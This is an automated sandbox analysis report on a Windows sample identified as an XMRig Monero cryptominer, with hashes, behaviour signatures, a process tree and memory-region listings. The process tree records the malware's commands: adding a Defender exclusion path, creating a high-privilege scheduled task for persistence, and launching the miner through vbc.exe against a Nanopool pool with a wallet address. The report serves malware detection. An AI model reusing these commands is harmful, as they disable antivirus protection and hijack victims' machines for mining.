Analysis

  • max time kernel
    58s
  • max time network
    115s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    04-01-2023 23:28

General

  • Target

    file.exe

  • Size

    882KB

  • MD5

    1b946a8d9e0e30915f241061c5106a3f

  • SHA1

    2cf0b19ef93c46a164b0bc93cbb9f3793cb6c8cf

  • SHA256

    2371a3a7ac61d4daffa56c66420d0bc7ec99f1aa7dd4428f2be4cbb9dc25138f

  • SHA512

    b83858ee0e21c590cd932bbc92cbbf5a88d3458010535f18cfbe2343b99c396f373e788554b2638cfe0b76bca46e6b3734fe44d6b98d546b4252390a31be398f

  • SSDEEP

    24576:qe9E/+x1L3sNSaH3uhbTsjc/BIQ8iU7cG19:qD+sM4UfsXrc2

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 13 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1228
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1304
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WSEL" /tr "C:\ProgramData\7zip\WSEL.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:944
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WSEL" /tr "C:\ProgramData\7zip\WSEL.exe"
        3⤵
        • Creates scheduled task(s)
        PID:108
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:908

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/108-86-0x0000000000000000-mapping.dmp

  • memory/908-117-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/908-124-0x00000000001F0000-0x0000000000210000-memory.dmp

    Filesize

    128KB

  • memory/908-115-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/908-112-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/908-114-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/908-125-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/908-123-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/908-120-0x0000000140343234-mapping.dmp

  • memory/908-119-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/908-129-0x0000000000000000-0x0000000001000000-memory.dmp

    Filesize

    16.0MB

  • memory/908-127-0x0000000000000000-0x0000000001000000-memory.dmp

    Filesize

    16.0MB

  • memory/908-128-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/908-126-0x0000000000000000-0x0000000001000000-memory.dmp

    Filesize

    16.0MB

  • memory/908-110-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/908-109-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/908-107-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/908-105-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/908-103-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/908-101-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/908-100-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/944-84-0x0000000000000000-mapping.dmp

  • memory/1228-71-0x0000000000F20000-0x0000000001064000-memory.dmp

    Filesize

    1.3MB

  • memory/1228-99-0x000007FEFC8C0000-0x000007FEFC91B000-memory.dmp

    Filesize

    364KB

  • memory/1228-56-0x000007FEFA980000-0x000007FEFAA1C000-memory.dmp

    Filesize

    624KB

  • memory/1228-57-0x000007FEFF150000-0x000007FEFF1B7000-memory.dmp

    Filesize

    412KB

  • memory/1228-58-0x0000000077360000-0x000000007745A000-memory.dmp

    Filesize

    1000KB

  • memory/1228-59-0x000007FEFDB00000-0x000007FEFDB9F000-memory.dmp

    Filesize

    636KB

  • memory/1228-60-0x0000000077240000-0x000000007735F000-memory.dmp

    Filesize

    1.1MB

  • memory/1228-76-0x000007FEFD640000-0x000007FEFD717000-memory.dmp

    Filesize

    860KB

  • memory/1228-85-0x000007FEFB880000-0x000007FEFBA95000-memory.dmp

    Filesize

    2.1MB

  • memory/1228-87-0x000007FEFDEE0000-0x000007FEFDEFF000-memory.dmp

    Filesize

    124KB

  • memory/1228-88-0x0000000000F20000-0x0000000001064000-memory.dmp

    Filesize

    1.3MB

  • memory/1228-89-0x0000000000500000-0x0000000000543000-memory.dmp

    Filesize

    268KB

  • memory/1228-90-0x000007FEFCAA0000-0x000007FEFCAB7000-memory.dmp

    Filesize

    92KB

  • memory/1228-91-0x000007FEF11C0000-0x000007FEF11DC000-memory.dmp

    Filesize

    112KB

  • memory/1228-92-0x000007FEF11E0000-0x000007FEF1242000-memory.dmp

    Filesize

    392KB

  • memory/1228-93-0x000007FEFF690000-0x000007FEFF6DD000-memory.dmp

    Filesize

    308KB

  • memory/1228-94-0x000007FEF9D70000-0x000007FEF9DD4000-memory.dmp

    Filesize

    400KB

  • memory/1228-95-0x000007FEF9E20000-0x000007FEF9E91000-memory.dmp

    Filesize

    452KB

  • memory/1228-96-0x000007FEFD070000-0x000007FEFD095000-memory.dmp

    Filesize

    148KB

  • memory/1228-97-0x000007FEFADC0000-0x000007FEFADE7000-memory.dmp

    Filesize

    156KB

  • memory/1228-98-0x000007FEFD3E0000-0x000007FEFD416000-memory.dmp

    Filesize

    216KB

  • memory/1228-61-0x000007FEFD420000-0x000007FEFD48C000-memory.dmp

    Filesize

    432KB

  • memory/1228-62-0x000007FEFF3A0000-0x000007FEFF411000-memory.dmp

    Filesize

    452KB

  • memory/1228-122-0x0000000000F20000-0x0000000001064000-memory.dmp

    Filesize

    1.3MB

  • memory/1228-73-0x000007FEFCBF0000-0x000007FEFCC12000-memory.dmp

    Filesize

    136KB

  • memory/1228-72-0x000007FEF5DF0000-0x000007FEF5F1C000-memory.dmp

    Filesize

    1.2MB

  • memory/1228-55-0x000007FEFAC50000-0x000007FEFACBF000-memory.dmp

    Filesize

    444KB

  • memory/1228-70-0x000007FEFBAA0000-0x000007FEFBAF6000-memory.dmp

    Filesize

    344KB

  • memory/1228-69-0x000007FEFD720000-0x000007FEFD923000-memory.dmp

    Filesize

    2.0MB

  • memory/1228-68-0x000007FEFD9D0000-0x000007FEFDAFD000-memory.dmp

    Filesize

    1.2MB

  • memory/1228-67-0x0000000000500000-0x0000000000543000-memory.dmp

    Filesize

    268KB

  • memory/1228-66-0x0000000000F20000-0x0000000001064000-memory.dmp

    Filesize

    1.3MB

  • memory/1228-65-0x000007FEF5F20000-0x000007FEF690C000-memory.dmp

    Filesize

    9.9MB

  • memory/1228-64-0x000007FEFF580000-0x000007FEFF65B000-memory.dmp

    Filesize

    876KB

  • memory/1228-63-0x000007FEF6A60000-0x000007FEF6B57000-memory.dmp

    Filesize

    988KB

  • memory/1304-74-0x0000000000000000-mapping.dmp

  • memory/1304-75-0x000007FEFBCE1000-0x000007FEFBCE3000-memory.dmp

    Filesize

    8KB

  • memory/1304-79-0x0000000002834000-0x0000000002837000-memory.dmp

    Filesize

    12KB

  • memory/1304-77-0x000007FEED8D0000-0x000007FEEE2F3000-memory.dmp

    Filesize

    10.1MB

  • memory/1304-82-0x000000000283B000-0x000000000285A000-memory.dmp

    Filesize

    124KB

  • memory/1304-81-0x0000000002834000-0x0000000002837000-memory.dmp

    Filesize

    12KB

  • memory/1304-80-0x000000001B7C0000-0x000000001BABF000-memory.dmp

    Filesize

    3.0MB

  • memory/1304-78-0x000007FEECD70000-0x000007FEED8CD000-memory.dmp

    Filesize

    11.4MB